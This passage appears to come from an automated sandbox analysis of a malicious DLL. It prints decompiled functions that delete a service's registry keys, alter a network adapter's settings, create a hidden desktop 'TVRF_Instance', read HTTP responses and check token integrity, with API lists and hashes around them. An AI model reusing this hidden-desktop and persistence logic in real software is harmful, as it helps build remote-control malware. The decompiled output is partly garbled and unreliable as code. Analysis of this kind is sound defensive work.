				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
				RegDeleteKeyA(0x80000002,  &_v256);
				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6ecad543);
				return RegDeleteKeyA(0x80000002,  &_v248);
			}

0x6eca413d
0x6eca4142
0x6eca4147
0x6eca422f
0x6eca422f
0x6eca415c
0x6eca415e
0x6eca417a
0x6eca417c
0x6eca419d
0x6eca41ad
0x6eca41b9
0x6eca41c4
0x6eca41c4
0x6eca41ad
0x6eca41ca
0x6eca41e6
0x6eca41fb
0x6eca4216
0x00000000

APIs

Part of subcall function 6ECA3700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3719
Part of subcall function 6ECA3700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3725
Part of subcall function 6ECA3700: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6ECA373D
Part of subcall function 6ECA3700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA374F
Part of subcall function 6ECA3700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6ECA3764
Part of subcall function 6ECA3700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA377C
Part of subcall function 6ECA3700: Sleep.KERNEL32(000003E8), ref: 6ECA378E
Part of subcall function 6ECA3700: CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37B5
Part of subcall function 6ECA3700: CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37C0

wsprintfA.USER32 ref: 6ECA417A
RegCreateKeyExA.ADVAPI32 ref: 6ECA41A5
RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6ECA41B9
RegCloseKey.ADVAPI32(?), ref: 6ECA41C4
wsprintfA.USER32 ref: 6ECA41E6
RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6ECA41FB
wsprintfA.USER32 ref: 6ECA4216
RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6ECA4225

Strings

\Services\, xrefs: 6ECA4207
SYSTEM\CurrentControlSet%s%s%s, xrefs: 6ECA4210
USBPortsManagerGrp, xrefs: 6ECA41CF
svchost, xrefs: 6ECA416A, 6ECA41D6
USBManager, xrefs: 6ECA4138, 6ECA41B3, 6ECA4202
%s\%s%c%s, xrefs: 6ECA4174, 6ECA41E0

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
API String ID: 2810420714-3733378816
Opcode ID: 6824c44057044eec1c9accd0ca0dcc80fd39c225a36105cd871659703a1e7d92
Instruction ID: e33f764915e2e00290d276f134c5dd738144f66ada28aa498fcef133b641ce3f
Opcode Fuzzy Hash: 6824c44057044eec1c9accd0ca0dcc80fd39c225a36105cd871659703a1e7d92
Instruction Fuzzy Hash: F521C3B1140302BAE614DBDCCD85FBB3BB8AB9470DF004908FF54AA284F670A5058FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4300, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA4300() {
				char _v264;
				char _v364;
				int _v368;
				int _v372;
				char _v376;
				int _v380;
				int _v384;
				char _v388;
				int _v392;
				int _v396;
				int _v400;
				void* _v404;
				void* _v408;
				int _t49;
				int _t66;
				char* _t68;
				CHAR* _t83;
				int _t90;

				_t68 = M6ECB0584; // 0x0
				_t90 = 0;
				_v404 = 0;
				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
					L18:
					return _t90;
				}
				_v396 = 0;
				_v372 = 0;
				_v368 = 0;
				_v384 = 0;
				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
					L17:
					RegCloseKey(_v404);
					goto L18;
				}
				_t49 = _v396;
				if(_t49 <= 0) {
					goto L17;
				}
				_t66 = 0;
				if(_t49 <= 0) {
					L16:
					goto L17;
				} else {
					do {
						_v380 = 0x104;
						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
							goto L14;
						}
						_v408 = 0;
						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
							goto L14;
						}
						_v392 = 1;
						_v400 = 0x64;
						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
							_t83 = M6ECB04D8; // 0x0
							if(lstrcmpiA( &_v364, _t83) == 0) {
								_v400 = 4;
								_v392 = 4;
								_v388 = 0;
								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
									_v376 = 0x89;
									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
										_t90 = 1;
									}
								}
							}
						}
						CloseHandle(_v408);
						if(_t90 != 0) {
							break;
						}
						L14:
						_t66 = _t66 + 1;
					} while (_t66 < _v396);
					goto L16;
				}
			}

0x6eca4306
0x6eca4321
0x6eca4323
0x6eca432f
0x6eca44b9
0x6eca44c2
0x6eca44c2
0x6eca4355
0x6eca4359
0x6eca435d
0x6eca4361
0x6eca436d
0x6eca44ad
0x6eca44b2
0x00000000
0x6eca44b2
0x6eca4373
0x6eca4379
0x00000000
0x00000000
0x6eca4380
0x6eca4384
0x6eca44ac
0x00000000
0x6eca438a
0x6eca4391
0x6eca43a8
0x6eca43b8
0x00000000
0x00000000
0x6eca43d6
0x6eca43e2
0x00000000
0x00000000
0x6eca4402
0x6eca440a
0x6eca4416
0x6eca4418
0x6eca442c
0x6eca4441
0x6eca4445
0x6eca4455
0x6eca445d
0x6eca4464
0x6eca446c
0x6eca448c
0x6eca448c
0x6eca446c
0x6eca445d
0x6eca442c
0x6eca4496
0x6eca449e
0x00000000
0x00000000
0x6eca44a0
0x6eca44a0
0x6eca44a1
0x00000000
0x6eca44ab

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?), ref: 6ECA4327
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6ECA4365
RegEnumKeyExA.ADVAPI32 ref: 6ECA43B0
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,?), ref: 6ECA43DA
RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6ECA4412
lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA4424
RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6ECA4459
RegSetValueExA.ADVAPI32(?,Characteristics,00000000,00000004,?,00000004), ref: 6ECA4482
CloseHandle.KERNEL32(?), ref: 6ECA4496
RegCloseKey.ADVAPI32(?), ref: 6ECA44B2

Strings

d, xrefs: 6ECA440A
Characteristics, xrefs: 6ECA444F, 6ECA447C
ComponentId, xrefs: 6ECA43FC

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
String ID: Characteristics$ComponentId$d
API String ID: 678791777-1822972205
Opcode ID: 2888d88c13dc4662f20e3dcaa4bc946ea56fe065d06a485cb7798129673366cf
Instruction ID: ef90349ab9cd7aba5c17c3748671f61791f7acebb73b8c156d68074879c5099b
Opcode Fuzzy Hash: 2888d88c13dc4662f20e3dcaa4bc946ea56fe065d06a485cb7798129673366cf
Instruction Fuzzy Hash: DB5106B1218346AFD350DFA9D984EABBBF9FBC9B08F00491DFA95D2104E7709505CB22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAA130, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 72
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6ECAA130(void* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t5;
				struct HDESK__* _t7;
				struct HDESK__* _t13;
				void* _t15;

				if( *0x6ecb027c < 6 || M6ECB0544 != 0 || M6ECB0548 == 0) {
					if(_a4 == 0) {
						return _t5;
					} else {
						_a4 = 1;
						_t7 = GetThreadDesktop(GetCurrentThreadId());
						 *0x6ecb0484 = _t7;
						if(_t7 != 0) {
							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
							 *0x6ecb0480 = _t7;
							if(_t7 != 0) {
								_t15 = CreateThread(0, 0, E6ECA96D0, _a4, 0, 0);
								if(_t15 != 0) {
									WaitForSingleObject(_t15, 0xffffffff);
									CloseHandle(_t15);
									Sleep(0xfa0);
								}
								_t13 =  *0x6ecb0480; // 0x0
								return CloseDesktop(_t13);
							}
						}
						return _t7;
					}
				} else {
					_push(__edi);
					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
					__edi = __eax;
					if(__edi == 0) {
						L12:
						_pop(__edi);
						return __eax;
					}
					if(GetLastError() == 0xb7) {
						__eax = CloseHandle(__edi);
						goto L12;
					}
					__eax = GetCurrentThreadId();
					__eax = GetThreadDesktop(__eax);
					__ebx = CloseHandle;
					 *0x6ecb0484 = __eax;
					if(__eax != 0) {
						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
						 *0x6ecb0480 = __eax;
						if(__eax != 0) {
							__eax = _a4;
							_push(__esi);
							__esi = CreateThread(0, 0, E6ECA9D10, _a4, 0, 0);
							if(__esi != 0) {
								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
								Sleep(0xfa0);
							}
							__ecx =  *0x6ecb0480; // 0x0
							__eax = CloseDesktop(__ecx);
							_pop(__esi);
						}
					}
					__eax = CloseHandle(__edi);
					_pop(__edi);
					return __eax;
				}
			}

0x6ecaa137
0x6ecaa212
0x6ecaa184
0x6ecaa218
0x6ecaa218
0x6eca9bd7
0x6eca9bdd
0x6eca9be4
0x6eca9bf8
0x6eca9bfe
0x6eca9c05
0x6eca9c20
0x6eca9c24
0x6eca9c29
0x6eca9c30
0x6eca9c3b
0x6eca9c3b
0x6eca9c41
0x00000000
0x6eca9c4e
0x6eca9c05
0x6eca9c4f
0x6eca9c4f
0x6ecaa157
0x6ecaa157
0x6ecaa163
0x6ecaa169
0x6ecaa16d
0x6ecaa183
0x6ecaa183
0x00000000
0x6ecaa183
0x6ecaa17a
0x6ecaa17d
0x00000000
0x6ecaa17d
0x6ecaa186
0x6ecaa18d
0x6ecaa193
0x6ecaa199
0x6ecaa1a0
0x6ecaa1b4
0x6ecaa1ba
0x6ecaa1c1
0x6ecaa1c3
0x6ecaa1c7
0x6ecaa1dc
0x6ecaa1e0
0x6ecaa1ec
0x6ecaa1f3
0x6ecaa1f3
0x6ecaa1f9
0x6ecaa200
0x6ecaa206
0x6ecaa206
0x6ecaa1c1
0x6ecaa208
0x6ecaa20b
0x6ecaa20c
0x6ecaa20c

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,73FCF930,6ECAA2BE,00000001,?,?,?,?,?,?), ref: 6ECAA163
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6ECAA16F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECAA17D
GetCurrentThreadId.KERNEL32 ref: 6ECAA186
GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6ECAA18D
CreateDesktopA.USER32 ref: 6ECAA1B4
CreateThread.KERNEL32 ref: 6ECAA1D6
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6ECAA1E5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6ECAA1EC
Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6ECAA1F3
CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6ECAA200
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6ECAA208

Strings

TVRF_Instance, xrefs: 6ECAA158, 6ECAA1AF

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
String ID: TVRF_Instance
API String ID: 2944326888-3589830093
Opcode ID: d94b2f52061c6ffdb4e70ec3364a205b5ff6d7875926053dfb698f5286ebd129
Instruction ID: 2223e68a362e91309155ab9b6a0c126416ac903b42afc3cb8253d7e7bd60f697
Opcode Fuzzy Hash: d94b2f52061c6ffdb4e70ec3364a205b5ff6d7875926053dfb698f5286ebd129
Instruction Fuzzy Hash: 3921AE30145B03FBEB505BAC8E09B9E3A75AB86B2AF200604FB15962C4EB70D840CE15

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5540, Relevance: 21.1, APIs: 14, Instructions: 117
memorynetworkfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA5540(void* _a4, intOrPtr* _a8) {
				long _v4;
				void _v8;
				long* _v12;
				void* _v16;
				intOrPtr _v28;
				long _v32;
				void* _v44;
				int _v48;
				long _v60;
				int _t35;
				long _t40;
				void* _t44;
				long _t53;
				DWORD* _t54;

				_t54 = 0;
				_t53 = 0;
				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
				if(_t44 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					_v8 = 0;
					_v4 = 4;
					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
						_v32 = 0;
						if(InternetReadFile(_v16, _t44, 0x1fff,  &_v32) != 0) {
							while(1) {
								_t35 = _v48;
								if(_t35 == 0) {
									goto L15;
								}
								if(_t54 > 0x100000) {
									if(_t53 != 0) {
										goto L13;
									}
									goto L14;
								} else {
									if(_t53 != 0) {
										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
										if(_t40 == 0) {
											L13:
											HeapFree(GetProcessHeap(), 0, _t53);
											L14:
											_t53 = 0;
											_t54 = 0;
										} else {
											goto L10;
										}
									} else {
										_t12 = _t54 + 1; // 0x20000014
										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
										L10:
										_t53 = _t40;
										RtlMoveMemory(_t53 + _t54, _t44, _v48);
										_t54 = _t54 + _v60;
										 *(_t53 + _t54) = 0;
										_v60 = 0;
										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
											continue;
										} else {
										}
									}
								}
								goto L15;
							}
						}
					}
					L15:
					HeapFree(GetProcessHeap(), 0, _t44);
					 *_v12 = _t53;
					return _t54;
				}
			}

0x6eca5554
0x6eca5556
0x6eca5561
0x6eca5565
0x6eca567f
0x6eca568a
0x6eca556b
0x6eca5580
0x6eca5584
0x6eca5594
0x6eca55b8
0x6eca55c4
0x6eca55d0
0x6eca55d0
0x6eca55d6
0x00000000
0x00000000
0x6eca55e2
0x6eca564d
0x00000000
0x00000000
0x00000000
0x6eca55e4
0x6eca55e6
0x6eca5604
0x6eca560c
0x6eca564f
0x6eca5655
0x6eca565b
0x6eca565b
0x6eca565d
0x00000000
0x00000000
0x00000000
0x6eca55e8
0x6eca55e8
0x6eca55f1
0x6eca560e
0x6eca5613
0x6eca561a
0x6eca561f
0x6eca5632
0x6eca5637
0x6eca5647
0x00000000
0x00000000
0x6eca5649
0x6eca5647
0x6eca55e6
0x00000000
0x6eca55e2
0x6eca55d0
0x6eca55c4
0x6eca565f
0x6eca5665
0x6eca566f
0x6eca567a
0x6eca567a

APIs

GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6ECA5558
HeapAlloc.KERNEL32(00000000), ref: 6ECA555B
HttpQueryInfoA.WININET ref: 6ECA558C
InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6ECA55BC
GetProcessHeap.KERNEL32(00000000,20000014), ref: 6ECA55EE
HeapAlloc.KERNEL32(00000000), ref: 6ECA55F1
GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6ECA5601
HeapReAlloc.KERNEL32(00000000), ref: 6ECA5604
RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6ECA561A
InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6ECA563F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA5652
HeapFree.KERNEL32(00000000), ref: 6ECA5655
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA5662
HeapFree.KERNEL32(00000000), ref: 6ECA5665

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
String ID:
API String ID: 1362589046-0
Opcode ID: 5e30263d0a350cd849d8b3173b98dcf19fe6e6df158ce3151af5e0bc99964cf0
Instruction ID: 8ad067ae6043b68e95bba1999263d777ac10189274641f776d4baccfc38fa123
Opcode Fuzzy Hash: 5e30263d0a350cd849d8b3173b98dcf19fe6e6df158ce3151af5e0bc99964cf0
Instruction Fuzzy Hash: 873160B12043029BD700DF99D944F6BBBEDFB89748F01491DFA5993244EB34D905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA7C40, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E6ECA7C40(signed int __eax, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				char _v516;
				short _v524;
				short _v532;
				signed int _t19;
				intOrPtr _t21;
				WCHAR* _t23;
				WCHAR* _t26;
				intOrPtr _t34;
				intOrPtr _t40;
				WCHAR* _t44;
				WCHAR* _t47;
				WCHAR* _t52;
				WCHAR* _t54;

				_t19 = __eax;
				_t54 = _a4;
				if(_t54 == 0) {
					L10:
					_push(_a28);
					_push(_a24);
					_t21 = _a12;
					_push(_a20);
					_push(_a16);
					_push(_t21);
					_push(_a8);
					_push(_t54);
					M6ECB05A4();
					return _t21;
				} else {
					if( *_t54 != 0x3a) {
						_t52 = PathFindFileNameW(_t54);
						_t23 = M6ECB0528; // 0xcc27f0
						if(lstrcmpiW(_t54, _t23) == 0) {
							_pop(_t52);
							_pop(_t54);
							_t44 = M6ECB0534; // 0xcc2700
							_a4 = _t44;
							goto M6ECB05A4;
						}
						_t47 = M6ECB056C; // 0x0
						_t19 = lstrcmpiW(_t52, _t47);
						if(_t19 == 0) {
							goto L2;
						} else {
							_t26 = M6ECB0554; // 0x0
							_t19 = StrCmpNIW(_t54, _t26, 0xb);
							if(_t19 == 0) {
								goto L2;
							} else {
								if(lstrcmpiW(_t52, L"tv.ini") != 0) {
									goto L10;
								} else {
									wsprintfW( &_v532, L"%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t52);
									if(lstrcmpiW( &_v524, _t54) != 0) {
										goto L10;
									} else {
										_t40 = M6ECB0550; // 0x0
										wsprintfW( &_v524, L"%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t40, L".ini");
										_push(_a36);
										_push(_a32);
										_push(_a28);
										_t34 = _a16;
										_push(_a24);
										_push(_a20);
										_push(_t34);
										_push( &_v516);
										M6ECB05A4();
										return _t34;
									}
								}
							}
						}
					} else {
						L2:
						return _t19 | 0xffffffff;
					}
				}
			}

0x6eca7c40
0x6eca7c48
0x6eca7c52
0x6eca7d65
0x6eca7d7a
0x6eca7d82
0x6eca7d83
0x6eca7d8a
0x6eca7d92
0x6eca7d93
0x6eca7d94
0x6eca7d95
0x6eca7d96
0x6eca7da5
0x6eca7c58
0x6eca7c5c
0x6eca7c7a
0x6eca7c7c
0x6eca7c87
0x6eca7c89
0x6eca7c8a
0x6eca7c92
0x6eca7c98
0x6eca7c9c
0x6eca7c9c
0x6eca7ca2
0x6eca7caa
0x6eca7cae
0x00000000
0x6eca7cb0
0x6eca7cb0
0x6eca7cb9
0x6eca7cc1
0x00000000
0x6eca7cc3
0x6eca7ccd
0x00000000
0x6eca7cd3
0x6eca7ceb
0x6eca7cfa
0x00000000
0x6eca7cfc
0x6eca7cfc
0x6eca7d19
0x6eca7d33
0x6eca7d3b
0x6eca7d43
0x6eca7d44
0x6eca7d4b
0x6eca7d4c
0x6eca7d4d
0x6eca7d52
0x6eca7d53
0x6eca7d62
0x6eca7d62
0x6eca7cfa
0x6eca7ccd
0x6eca7cc1
0x6eca7c60
0x6eca7c60
0x6eca7c6a
0x6eca7c6a
0x6eca7c5c

APIs

PathFindFileNameW.SHLWAPI(?), ref: 6ECA7C6E
lstrcmpiW.KERNEL32(?,00CC27F0), ref: 6ECA7C83

Strings

%s%s%s, xrefs: 6ECA7D13
tv.ini, xrefs: 6ECA7CC3
%s%s, xrefs: 6ECA7CE5
.ini, xrefs: 6ECA7D08

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindNamePathlstrcmpi
String ID: %s%s$%s%s%s$.ini$tv.ini
API String ID: 1236376524-2591480844
Opcode ID: aed4e2e163a5c5e7ccabbd3a2e842e74a498bc7fe9fe10343bb4f8ff67a8877d
Instruction ID: 90d56b97fcc1a11bf9326ad781683e800d6b43c0011252d6e0c60488903914b1
Opcode Fuzzy Hash: aed4e2e163a5c5e7ccabbd3a2e842e74a498bc7fe9fe10343bb4f8ff67a8877d
Instruction Fuzzy Hash: DE31BD72205602ABC620DB98DE85EAB77B8EFC9724F10451DFA4583244E734E8058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3390, Relevance: 19.6, APIs: 13, Instructions: 108
memoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6ECA3390() {
				intOrPtr _v4;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				void* _v24;
				long _v28;
				void* _t56;

				_v12 = 0;
				_v20 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
					return 0;
				} else {
					_v24 = 0;
					if(GetTokenInformation(_v20, 1, 0, 0,  &_v24) == 0 && GetLastError() == 0x7a) {
						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
						if(_t56 != 0) {
							if(GetTokenInformation(_v24, 1, _t56, _v28,  &_v28) != 0) {
								_v16.Value = 0;
								_v12 = 0x500;
								_v24 = 0;
								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
									if(EqualSid( *_t56, _v24) == 0) {
										_push(_v4);
										_push( *_t56);
										L6ECAC384();
									} else {
										_v20 = 1;
									}
								}
								FreeSid(_v24);
							}
							HeapFree(GetProcessHeap(), 0, _t56);
						}
					}
					CloseHandle(_v24);
					return _v16.Value;
				}
			}

0x6eca33a2
0x6eca33a6
0x6eca33b2
0x6eca34ae
0x6eca33b8
0x6eca33cd
0x6eca33d5
0x6eca3401
0x6eca3405
0x6eca3421
0x6eca3438
0x6eca343c
0x6eca3443
0x6eca344f
0x6eca3461
0x6eca3473
0x6eca3474
0x6eca3475
0x6eca3463
0x6eca3463
0x6eca3463
0x6eca3461
0x6eca347f
0x6eca347f
0x6eca348a
0x6eca348a
0x6eca3490
0x6eca3496
0x6eca34a6
0x6eca34a6

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6ECA33AA
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6ECA33D1
GetLastError.KERNEL32 ref: 6ECA33DB
GetProcessHeap.KERNEL32(00000008,?), ref: 6ECA33F8
HeapAlloc.KERNEL32(00000000), ref: 6ECA33FB
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6ECA341D
AllocateAndInitializeSid.ADVAPI32 ref: 6ECA3447
EqualSid.ADVAPI32(?,00000000), ref: 6ECA3459
ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6ECA3475
FreeSid.ADVAPI32(00000000), ref: 6ECA347F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA3487
HeapFree.KERNEL32(00000000), ref: 6ECA348A
CloseHandle.KERNEL32(?), ref: 6ECA3496

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
String ID:
API String ID: 1769087308-0
Opcode ID: 2f5cef247efcac5d0059a7fd9510bcddae220e1c533e5c38dbad87a8efb9399a
Instruction ID: 6b1cfb3c2ebe7da79d98b24cf8c69fa5601ad1c864d8fbadd18028925db0b9a8
Opcode Fuzzy Hash: 2f5cef247efcac5d0059a7fd9510bcddae220e1c533e5c38dbad87a8efb9399a
Instruction Fuzzy Hash: B0311BB1204302AFD610DFADCC98D9FBBB9EB85754F00891CFA9583245E775D805CBA1

Uniqueness

Uniqueness Score: -1.00%

